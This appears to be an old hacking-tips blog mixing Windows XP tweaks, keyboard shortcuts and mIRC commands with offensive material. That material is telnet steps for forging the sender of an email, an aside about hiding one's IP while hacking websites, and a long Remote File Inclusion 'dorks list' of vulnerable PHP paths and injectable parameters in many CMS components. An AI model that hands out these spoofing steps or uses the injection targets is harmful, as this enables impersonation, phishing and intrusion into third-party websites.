Followers

Tuesday, January 19, 2010

Email Forge ,Send Email from anyone.

1. Some ISP's block port 25 so it might not work
2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):



code:--------------------------------------------------------------------------------
telnet mail.hotmail.com 25
--------------------------------------------------------------------------------


When yer connected type in (except what's in between *'s; you chose what will go in the []):

code:--------------------------------------------------------------------------------
helo
*wait*
mail from:[whoever]@[whoever.com]
*wait*
rcpt to:[whoever]@[whoever.com]
*wait*
data
*wait*
[write]
[whatever you want]
[in]
[as many]
[lines as wished]
.
*wait*
quit
--------------------------------------------------------------------------------


Hello is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.

Disable the Send Error Report ,to Microsoft.

To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:

*************************************************************************

Open Control Panel
Click on Preformance and Maintenance.
Click on System.
Then click on the Advanced tab
Click on the error reporting button on the bottom of the windows.
Select Disable error reporting.
Click OK
Click OK

*************************************************************************

CMD Prompt here, add to folder context menu windows xp.

add the open cmd prompt to folder context menus
also drives and My Computer

copy what's in the code area to notepad and save as cmd here.reg

CODE

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_CLASSES_ROOT\Directory\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
@="Command Prompt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

Change Your I.P Less Than 1 minute.

How To: Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Change Text On Xp Start Button.

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We?re going to modify item 578, currently showing the word ?start? just as it displays on the current Start button.

There is no magic here. Just double click on the word ?start? so that it?s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you?ll type. Go ahead and type your new entry. In my case I used Click Me!

You?ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won?t get into what?s involved in compiling a script, but suffice it to say it?s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command ? Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 ? Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it?s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don?t know how to access the registry I?m not sure this article is for you, but just in case it?s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that?s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Boot WinXp Fast.

Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

23 Ways to Boost XP other than Defrag.

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.


Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

SQL Injection Best Tutorial in the World

This summary is not available. Please click here to view the post.

Friday, January 15, 2010

Keyboard Shortcuts.

Here is the list of Keyboard shorcuts.
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day.

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

All Mirc Commands.

 All mIRC Commands

/ Recalls the previous command entered in the current window.
/! Recalls the last command typed in any window.
/action {action text} Sends the specifed action to the active channel or query window.
/add [-apuce] {filename.ini} Loads aliases, popups, users, commands, and events.
/ame {action text} Sends the specifed action to all channels which you are currently on.
/amsg {text} Sends the specifed message to all channels which you are currently on.
/auser {level} {nick|address} Adds a user with the specified access level to the remote users
list.
/auto [on|off|nickname|address] Toggles auto-opping of a nick or address or sets it on or off
totally.
/away {away message} Sets you away leave a message explaining that you are not currently paying
attention to IRC.
/away Sets you being back.
/ban [#channel] {nickname} [type] Bans the specified nick from the curent or given channel.
/beep {number} {delay} Locally beeps 'number' times with 'delay' in between the beeps. /channel
Pops up the channel central window (only works in a channel).
/clear Clears the entire scrollback buffer of the current window.
/ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} Does the given ctcp request on
nickname.
/closemsg {nickname} Closes the query window you have open to the specified nick.
/creq [ask | auto | ignore] Sets your DCC 'On Chat request' settings in DCC/Options.
/dcc send {nickname} {file1} {file2} {file3} ... {fileN} Sends the specified files to nick.
/dcc chat {nickname} Opens a dcc window and sends a dcc chat request to nickname.
/describe {#channel} {action text} Sends the specifed action to the specified channel window.
/dde [-r] {service} {topic} {item} [data] Allows DDE control between mIRC and other
applications.
/ddeserver [on [service name] | off] To turn on the DDE server mode, eventually with a given
service name.
/disable {#groupname} De-activates a group of commands or events.
/disconnect Forces a hard and immediate disconnect from your IRC server. Use it with care.
/dlevel {level} Changes the default user level in the remote section.
/dns {nickname | IP address | IP name} Uses your providers DNS to resolve an IP address.
/echo [nickname|#channel|status] {text} Displays the given text only to YOU on the given place
in color N.
/enable {#groupname} Activates a group of commands or events.
/events [on|off] Shows the remote events status or sets it to listening or not.
/exit Forces mIRC to closedown and exit.
/finger Does a finger on a users address.
/flood [{numberoflines} {seconds} {pausetime}] Sets a crude flood control method.
/fsend [on|off] Shows fsends status and allows you to turn dcc fast send on or off.
/fserve {nickname} {maxgets} {homedirectory} [welcome text file] Opens a fileserver.
/guser {level} {nick} [type] Adds the user to the user list with the specified level and
address type.
/help {keyword} Brings up the Basic IRC Commands section in the mIRC help file.
/ignore [on|off|nickname|address] Toggles ignoring of a nick or address or sets it on or off
totally.
/invite {nickname} {#channel} Invites another user to a channel.
/join {#channel} Makes you join the specified channel.
/kick {#channel} {nickname} Kicks nickname off a given channel.
/list [#string] [-min #] [-max #] Lists all currently available channels, evt. filtering for
parameters.
/log [on|off] Shows the logging status or sets it on or off for the current window.
/me {action text} Sends the specifed action to the active channel or query window.
/mode {#channel|nickname} [[+|-]modechars [parameters]] Sets channel or user modes.
/msg {nickname} {message} Send a private message to this user without opening a query window.
/names {#channel} Shows the nicks of all people on the given channel.
/nick {new nickname} Changes your nickname to whatever you like.
/notice {nick} {message} Send the specified notice message to the nick.
/notify [on|off|nickname] Toggles notifying you of a nick on IRC or sets it on or off totally.
/onotice [#channel] {message} Send the specified notice message to all channel ops.
/omsg [#channel] {message} Send the specified message to all ops on a channel.
/part {#channel} Makes you leave the specified channel.
/partall Makes you leave all channels you are on.
/ping {server address} Pings the given server. NOT a nickname.
/play [-c] {filename} [delay] Allows you to send text files to a window.
/pop {delay} [#channel] {nickname} Performs a randomly delayed +o on a not already opped nick.
/protect [on|off|nickname|address] Toggles protection of a nick or address or sets it on or off
totally.
/query {nickname} {message} Open a query window to this user and send them the private message.
/quit [reason] Disconnect you from IRC with the optional byebye message.
/raw {raw command} Sends any raw command you supply directly to the server. Use it with care!!
/remote [on|off] Shows the remote commands status or sets it to listening or not.
/rlevel {access level} Removes all users from the remote users list with the specified access
level.
/run {c:\path\program.exe} [parameters] Runs the specified program, evt. with parameters.
/ruser {nick[!]|address} [type] Removes the user from the remote users list.
/save {filename.ini} Saves remote sections into a specified INI file.
/say {text} Says whatever you want to the active window.
/server [server address [port] [password]] Reconnects to the previous server or a newly
specified one.
/sound [nickname|#channel] {filename.wav} {action text} Sends an action and a fitting sound.
/speak {text} Uses the external text to speech program Monologue to speak up the text.
/sreq [ask | auto | ignore] Sets your DCC 'On Send request' settings in DCC/Options.
/time Tells you the time on the server you use.
/timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] Activates a timer.
/topic {#channel} {newtopic} Changes the topic for the specified channel.
/ulist [{|}]{level} Lists all users in the remote list with the specified access levels.
/url [-d] Opens the URL windows that allows you to surf the www parallel to IRC.
/uwho [nick] Pops up the user central with information about the specified user.
/who {#channel} Shows the nicks of all people on the given channel.
/who {*address.string*} Shows all people on IRC with a matching address.
/whois {nickname} Shows information about someone in the status window.
/whowas {nickname} Shows information about someone who -just- left IRC.
/wavplay {c:\path\sound.wav} Locally plays the specified wave file.
/write [-cidl] {filename} [text] To write the specified text to a .txt file.

My dorks list for R.F.I.

R.F.I stands for Remote File Inclusion.My Purpose of posting the dorks here is only for educational purpose.
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/coppermine/themes/maze/theme.php?THEME_DIR=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/e107/e107_handlers/secure_img_render.php?p=
/modules/My_eGallery/public/inc/?HCL_path=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/index.php?basepath=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpEx=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath=
/phpBB/admin/admin_styles.php?mode=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/forum/auth/auth.php?phpbb_root_path=
/forum/auth/auth_phpbb/phpbb_root_path=
/cutenews/comments.php?cutepath=
/library/lib.php?root=
/impex/ImpExData.php?systempath=
/coppermine/thumbnails.php?lang=
/gallery/thumbnails.php?lang=
/aWebNews/visview.php?path_to_news=
/ashnews.php?pathtoashnews=
/4images/index.php?template=
/galeri/index.php?template=
/gallery/index.php?template=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/forums/toplist.php?phpbb_root_path=
/forum/toplist.php?phpbb_root_path=
/admin/config_settings.tpl.php?include_path=
/include/common.php?include_path=
/event/index.php?page=
/forum/index.php?includeFooter=
/forums/index.php?includeFooter=
/forum/bb_admin.php?includeFooter=
/forums/bb_admin.php?includeFooter=
/language/lang_english/lang_activity.php?phpbb_root_path=
/forum/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/master.php?root_path=
/includes/kb_constants.php?module_root_path=
/forum/includes/kb_constants.php?module_root_path=
/forums/includes/kb_constants.php?module_root_path=
/classes/adodbt/sql.php?classes_dir=
/modules/mod_calendar.php?absolute_path=
/agenda.php3?rootagenda=
/agenda2.php3?rootagenda=
/sources/lostpw.php?CONFIG[path]=
/topsites/sources/lostpw.php?CONFIG[path]=
/toplist/sources/lostpw.php?CONFIG[path]=
/sources/join.php?CONFIG[path]=
/topsites/sources/join.php?CONFIG[path]=
/toplist/sources/join.php?CONFIG[path]=
/topsite/sources/join.php?CONFIG[path]=
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
/extras/poll/poll.php?file_newsportal=
/calogic/reconfig.php?GLOBALS[CLPath]=
/eshow.php?Config_rootdir=
/auction/auction_common.php?phpbb_root_path=
/calendar/index.php?inc_dir=
/modules/TotalCalendar/index.php?inc_dir=
/modules/calendar/index.php?inc_dir=
/calendar/embed/day.php?path=
/ACalendar/embed/day.php?path=
/calendar/add_event.php?inc_dir=
/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
/claroline/auth/ldap/authldap.php?includePath=
/docebo/modules/credits/help.php?lang=
/modules/credits/help.php?lang=
/includes/pafiledb_constants.php?module_root_path=
/phpBB/includes/pafiledb_constants.php?module_root_path=
/pafiledb/includes/pafiledb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
/apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
/phpdig/includes/config.php?relative_script_path=
/includes/phpdig/includes/config.php?relative_script_path=
/includes/dbal.php?eqdkp_root_path=
/eqdkp/includes/dbal.php?eqdkp_root_path=
